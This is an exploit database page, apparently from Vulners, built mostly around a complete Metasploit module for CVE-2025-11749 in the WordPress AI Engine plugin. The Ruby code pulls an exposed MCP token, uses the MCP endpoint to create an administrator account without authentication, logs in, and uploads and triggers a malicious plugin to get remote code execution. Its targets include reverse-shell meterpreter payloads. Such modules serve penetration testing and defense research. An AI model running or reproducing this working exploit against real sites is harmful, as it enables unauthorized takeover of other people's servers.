Lucene search
K

WordPress AI Engine Plugin MCP Unauthenticated Admin Creation to RCE

Exploits unauthenticated admin creation in the WordPress AI Engine plugin to obtain remote code execution.

Related
Code
Reporter | Title | Published | Views
Family
GithubExploit
Exploit for CVE-2025-11749
8 Nov 2025 03:19
githubexploit
Circl
CVE-2025-11749
4 Nov 2025 18:16
circl
CNNVD
WordPress plugin AI Engine 信息泄露漏洞
5 Nov 2025 00:00
cnnvd
CVE
CVE-2025-11749
5 Nov 2025 05:31
cve
Cvelist
CVE-2025-11749 AI Engine <= 3.1.3 - Unauthenticated Sensitive Information Exposure to Privilege Escalation
5 Nov 2025 05:31
cvelist
EUVD
EUVD-2025-37802
5 Nov 2025 05:31
euvd
Nuclei
WordPress AI Engine Plugin - Token Exposure
2 Jun 2026 10:14
nuclei
NVD
CVE-2025-11749
5 Nov 2025 06:15
nvd
Packet Storm
📄 WordPress AI Engine 3.1.3 Remote Code Execution
4 Dec 2025 00:00
packetstorm
Packet Storm
📄 WordPress AI Engine 3.1.3 Add Admin / Shell Upload
4 Mar 2026 00:00
packetstorm
Rows per page
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Payload::Php
  include Msf::Exploit::FileDropper
  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::Remote::HTTP::Wordpress

  prepend Msf::Exploit::Remote::AutoCheck

  # Case-insensitive pattern matched against MCP error messages and raw
  # response bodies to recognise a "user already exists" reply.
  ERROR_PATTERN = /already exists|username.*taken|user.*exists/i
  # Case-insensitive pattern matched against MCP result text and raw response
  # bodies to recognise a successful create/update reply. Note that the bare
  # `success` and `created` alternatives match anywhere in the text.
  SUCCESS_PATTERN = /User (?:created|updated|#\d+ updated)|success|created/i

  # Registers the module metadata (name, description, authors, references,
  # targets and notes) and the USERNAME, PASSWORD and EMAIL options.
  #
  # @param info [Hash] metadata merged with this module's values via update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'WordPress AI Engine Plugin MCP Unauthenticated Admin Creation to RCE',
        'Description' => %q{
          This module exploits an unauthenticated vulnerability in the WordPress AI Engine plugin
          (versions <= 3.1.3). The vulnerability allows an attacker to create an administrator account
          via the MCP (Model Context Protocol) endpoint without authentication. The module supports
          both `/wp-json/mcp/v1/` and `/?rest_route=/mcp/v1/` endpoints. Once an administrator
          account is created, the module uploads and executes a malicious plugin to achieve remote
          code execution (RCE).
        },
        'Author' => [
          'Emiliano Versini',                             # Vulnerability discovery
          'Khaled Alenazi (Nxploited)',                   # PoC
          'Valentin Lobstein <chocapikk[at]leakix.net>',  # Metasploit module
          'dledda-r7'                                     # Reviewer
        ],
        'License' => MSF_LICENSE,
        'References' => [
          ['CVE', '2025-11749'],
          ['URL', 'https://github.com/Nxploited/CVE-2025-11749']
        ],
        'DisclosureDate' => '2025-11-04',
        # Index into 'Targets' below: the PHP target is selected by default.
        'DefaultTarget' => 0,
        'Privileged' => false,
        # Three targets: one PHP payload target and two command-payload
        # targets that differ only by platform.
        'Targets' => [
          [
            'PHP In-Memory',
            {
              'Platform' => 'php',
              'Arch' => ARCH_PHP
              # tested with php/meterpreter/reverse_tcp
            }
          ],
          [
            'Unix/Linux Command Shell',
            {
              'Platform' => %w[unix linux],
              'Arch' => ARCH_CMD
              # tested with cmd/linux/http/x64/meterpreter/reverse_tcp
            }
          ],
          [
            'Windows Command Shell',
            {
              'Platform' => 'win',
              'Arch' => ARCH_CMD
              # tested with cmd/windows/http/x64/meterpreter/reverse_tcp
            }
          ]
        ],
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [REPEATABLE_SESSION],
          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
        }
      )
    )

    # Credentials for the account the module creates. The Faker calls are
    # evaluated here, so the default values are generated when this method runs.
    # NOTE(review): the leading `true` in each array presumably marks the option
    # as required (Metasploit option convention) - confirm against OptString docs.
    register_options(
      [
        OptString.new('USERNAME', [true, 'Username to create', Faker::Internet.username]),
        OptString.new('PASSWORD', [true, 'Password for the new user', Faker::Internet.password(min_length: 8)]),
        OptString.new('EMAIL', [true, 'Email for the new user', Faker::Internet.email])
      ]
    )
  end

  # Decides whether the target looks vulnerable.
  #
  # Steps, in order: confirm WordPress is reachable, compare the `ai-engine`
  # readme version against 3.1.4, then look for an MCP token in the REST route
  # index. A token that is found is cached in @token.
  #
  # @return [Object] the CheckCode value describing the outcome
  def check
    unless wordpress_and_online?
      return CheckCode::Unknown('The target does not appear to be running WordPress')
    end

    readme_verdict = check_plugin_version_from_readme('ai-engine', '3.1.4')
    return readme_verdict if readme_verdict == CheckCode::Safe

    @token = find_token
    if @token
      CheckCode::Appears('The target appears to be a vulnerable version')
    else
      CheckCode::Safe('MCP token not found. Plugin may be patched or not configured.')
    end
  end

  # Module entry point.
  #
  # Verifies WordPress is reachable, obtains the MCP token (reusing @token when
  # it is already set), asks the MCP endpoint to create the configured account,
  # logs in with it and hands the session cookie to upload_and_execute_payload.
  # When the account already exists, its password is updated before the login.
  #
  # Aborts through fail_with when WordPress is not detected, no token is
  # found, account creation fails, or the login fails.
  def exploit
    unless wordpress_and_online?
      fail_with(Failure::NotFound, 'The target does not appear to be using WordPress')
    end

    @token ||= find_token
    unless @token
      fail_with(Failure::NotVulnerable, 'MCP token not found. Plugin may be patched or not configured.')
    end

    login_name = datastore['USERNAME']
    login_pass = datastore['PASSWORD']
    login_mail = datastore['EMAIL']

    outcome = create_admin_user(@token, login_name, login_pass, login_mail)
    fail_with(Failure::UnexpectedReply, 'Failed to create administrator account.') if outcome == false

    account_existed = outcome == :user_exists
    if account_existed
      print_warning('User already exists, updating password and continuing exploitation...')
      update_user_password(@token, login_name, login_pass)
    end

    session_cookie = wordpress_login(login_name, login_pass)
    unless session_cookie
      failure_text = 'Failed to log in to WordPress admin.'
      failure_text = "#{failure_text} User may exist with a different password." if account_existed
      fail_with(Failure::UnexpectedReply, failure_text)
    end

    upload_and_execute_payload(session_cookie)
  end

  # REST API helpers
  # REST API helpers

  # Sends a request to a WordPress REST route, trying the `wp-json` path first
  # and, when that does not answer 200, repeating the request with the
  # `rest_route` query parameter instead.
  #
  # @param rest_path [String] REST route, e.g. '/'
  # @param method [String] HTTP method; 'POST' sets a JSON content type
  # @param data [String, nil] request body
  # @return [Object, nil] the first 200 response, otherwise whatever the
  #   `rest_route` request returned (possibly nil)
  def send_rest_request(rest_path, method: 'GET', data: nil)
    content_type = method == 'POST' ? 'application/json' : nil
    base_opts = { 'method' => method, 'ctype' => content_type, 'data' => data }

    pretty_uri = normalize_uri(target_uri.path, 'wp-json', rest_path)
    pretty_res = send_request_cgi(base_opts.merge('uri' => pretty_uri))
    return pretty_res if pretty_res&.code == 200

    fallback_opts = base_opts.merge(
      'uri' => normalize_uri(target_uri.path),
      'vars_get' => { 'rest_route' => rest_path }
    )
    send_request_cgi(fallback_opts)
  end

  # Requests the REST route index ('/') and extracts the MCP token from it.
  #
  # @return [String, nil] the token, or nil when none is found
  def find_token
    index_response = send_rest_request('/')
    extract_token_from_routes(index_response)
  end

  # Pulls the MCP token out of a REST route index response.
  #
  # The response's JSON document is expected to be a Hash with a 'routes' Hash
  # whose keys are route strings. The first key of the exact form
  # `/mcp/v1/<token>/sse` yields <token>; a token equal to 'sse' is skipped.
  #
  # @param res [Object, nil] response exposing `code` and `get_json_document`
  # @return [String, nil] the token, or nil when the response is missing, is
  #   not a 200, is not a JSON object, or has no matching route
  def extract_token_from_routes(res)
    return nil unless res&.code == 200

    # The JSON root may be an Array or a scalar; calling `dig` with a String
    # key on those raises, so require a Hash first.
    document = res.get_json_document
    return nil unless document.is_a?(Hash)

    routes = document['routes']
    return nil unless routes.is_a?(Hash)

    # \A and \z anchor the whole key; ^ and $ would also match a single line
    # inside a multi-line key.
    mcp_regex = %r{\A/mcp/v1/([^/]+)/sse\z}
    routes.each_key do |route|
      next unless route.is_a?(String)

      # The capture is `[^/]+`, so a match is never empty.
      token = route[mcp_regex, 1]
      next if token.nil? || token == 'sse'

      return token
    end
    nil
  end

  # MCP API helpers
  # MCP API helpers

  # Sends a request to `/mcp/v1/<token>/<segments joined by '/'>` through
  # send_rest_request.
  #
  # @param token [String] MCP token placed in the route
  # @param segments [Array<String>] trailing path segments
  # @param method [String] HTTP method
  # @param data [String, nil] request body
  # @return [Object, nil] whatever send_rest_request returns
  def send_mcp_request(token, segments, method: 'GET', data: nil)
    tail = segments.join('/')
    send_rest_request("/mcp/v1/#{token}/#{tail}", method: method, data: data)
  end

  # Serialises a JSON-RPC 2.0 `tools/call` request with a random id between
  # 1 and 999_999.
  #
  # @param tool_name [String] value of params.name
  # @param arguments [Hash] value of params.arguments
  # @return [String] the request encoded as JSON
  def build_mcp_payload(tool_name, arguments)
    call_params = { 'name' => tool_name, 'arguments' => arguments }
    envelope = {
      'jsonrpc' => '2.0',
      'id' => rand(1..999_999),
      'method' => 'tools/call',
      'params' => call_params
    }
    envelope.to_json
  end

  # Calls an MCP tool and returns the raw `result.content` value of the reply.
  #
  # @param token [String] MCP token
  # @param tool_name [String] tool to invoke
  # @param arguments [Hash] tool arguments
  # @return [Object, nil] the value stored under result.content, or nil when
  #   there is no response, the status is not 200, the JSON root is not an
  #   object, or `result` is not an object
  def send_mcp_tool_call_raw(token, tool_name, arguments)
    payload = build_mcp_payload(tool_name, arguments)
    res = send_mcp_request(token, ['sse'], method: 'POST', data: payload)
    return nil unless res&.code == 200

    json_response = res.get_json_document
    return nil unless json_response.is_a?(Hash)

    # Hash#dig raises TypeError when 'result' is a scalar or Array, so check
    # its type before reading 'content'.
    result = json_response['result']
    return nil unless result.is_a?(Hash)

    result['content']
  end

  # Calls an MCP tool and classifies the reply.
  #
  # Classification order: no response => false; 204 => true; any other
  # non-200 => false; JSON error object with code 'existing_user_login' or a
  # message matching ERROR_PATTERN => :user_exists; a result.content entry
  # whose 'text' matches SUCCESS_PATTERN => true; otherwise the raw body is
  # matched against ERROR_PATTERN, then SUCCESS_PATTERN.
  #
  # Unexpected JSON shapes (scalar `result`, non-Array content, non-Hash
  # entries, non-String text or message) are skipped rather than raising, so
  # the raw-body fallback is still reached.
  #
  # @param token [String] MCP token
  # @param tool_name [String] tool to invoke
  # @param arguments [Hash] tool arguments
  # @return [true, false, Symbol] true on success, :user_exists when the
  #   account is reported as existing, false otherwise
  def send_mcp_tool_call(token, tool_name, arguments)
    payload = build_mcp_payload(tool_name, arguments)
    res = send_mcp_request(token, ['sse'], method: 'POST', data: payload)
    return false unless res
    return true if res.code == 204
    return false unless res.code == 200

    json_response = res.get_json_document
    return false unless json_response.is_a?(Hash)

    error = json_response['error']
    if error.is_a?(Hash)
      return :user_exists if error['code'] == 'existing_user_login'
      # to_s keeps a nil or non-String message from raising.
      return :user_exists if error['message'].to_s.match?(ERROR_PATTERN)
    end

    # Hash#dig would raise TypeError on a scalar or Array `result`.
    result = json_response['result']
    content = result.is_a?(Hash) ? result['content'] : nil
    if content.is_a?(Array)
      reported_success = content.any? do |item|
        item.is_a?(Hash) && item['text'].to_s.match?(SUCCESS_PATTERN)
      end
      return true if reported_success
    end

    # Last resort: look for the same markers anywhere in the raw body.
    body = res.body.to_s
    return :user_exists if body.match?(ERROR_PATTERN)
    return true if body.match?(SUCCESS_PATTERN)

    false
  end

  # User management
  # User management

  # Looks up the numeric ID of a user through the `wp_get_users` MCP tool.
  #
  # Each content entry's 'text' is parsed as JSON (a single object or an array
  # of objects). The first object whose 'user_login' equals `username` and
  # that carries an 'ID' supplies the result. Entries that are not valid JSON,
  # and parsed values that are not objects (null, numbers, strings), are
  # skipped.
  #
  # @param token [String] MCP token
  # @param username [String] exact login to look for
  # @return [Integer, nil] the user's ID, or nil when it cannot be determined
  def get_user_id(token, username)
    arguments = {
      'search' => username,
      'search_columns' => ['user_login']
    }

    result_content = send_mcp_tool_call_raw(token, 'wp_get_users', arguments)
    return nil unless result_content.is_a?(Array)

    result_content.each do |item|
      next unless item.is_a?(Hash) && item['text']

      begin
        parsed = JSON.parse(item['text'].to_s)
      rescue JSON::ParserError
        next
      end

      # Keep only JSON objects: `null` or scalar entries would otherwise raise
      # on the `['user_login']` lookup, which the rescue above does not cover.
      users = (parsed.is_a?(Array) ? parsed : [parsed]).grep(Hash)
      user = users.find { |u| u['user_login'] == username }
      return user['ID'].to_i if user && user['ID']
    end

    nil
  end

  # Invokes the `wp_create_user` MCP tool with the 'administrator' role.
  #
  # @param token [String] MCP token
  # @param username [String] login for the new account
  # @param password [String] password for the new account
  # @param email [String] email for the new account
  # @return [true, false, Symbol] the classification from send_mcp_tool_call
  def create_admin_user(token, username, password, email)
    send_mcp_tool_call(
      token,
      'wp_create_user',
      {
        'user_login' => username,
        'user_email' => email,
        'user_pass' => password,
        'role' => 'administrator'
      }
    )
  end

  # Sets a new password on an existing account through the `wp_update_user`
  # MCP tool, after resolving the account's ID with get_user_id.
  #
  # Prints a warning when the tool call result is falsy.
  #
  # @param token [String] MCP token
  # @param username [String] login whose password is changed
  # @param password [String] new password
  # @return [true, false, Symbol] false when the ID lookup fails, otherwise
  #   the classification from send_mcp_tool_call
  def update_user_password(token, username, password)
    target_id = get_user_id(token, username)
    return false unless target_id

    changes = { 'user_pass' => password }
    request_args = { 'ID' => target_id, 'fields' => changes }

    send_mcp_tool_call(token, 'wp_update_user', request_args).tap do |outcome|
      print_warning('Password update may have failed, attempting login anyway...') unless outcome
    end
  end

  # Payload execution
  # Payload execution

  # Builds a plugin with randomly named plugin and payload files, uploads it
  # using the given admin session, registers the dropped files and plugin
  # directory for cleanup, then requests the payload file's URL.
  #
  # Aborts through fail_with when the upload is reported as failed.
  #
  # @param admin_cookie [Object] session cookie returned by wordpress_login
  # @return [Object, nil] the response of the final GET request
  def upload_and_execute_payload(admin_cookie)
    plugin_name = "wp_#{Rex::Text.rand_text_alphanumeric(5).downcase}"
    payload_name = "ajax_#{Rex::Text.rand_text_alphanumeric(5).downcase}"
    payload_file = "#{payload_name}.php"

    archive = generate_plugin(plugin_name, payload_name)
    uploaded = wordpress_upload_plugin(plugin_name, archive.pack, admin_cookie)
    fail_with(Failure::UnexpectedReply, 'Failed to upload the payload') unless uploaded

    register_files_for_cleanup(payload_file, "#{plugin_name}.php")
    register_dir_for_cleanup("../#{plugin_name}")

    trigger_uri = normalize_uri(wordpress_url_plugins, plugin_name, payload_file)
    send_request_cgi('uri' => trigger_uri, 'method' => 'GET')
  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation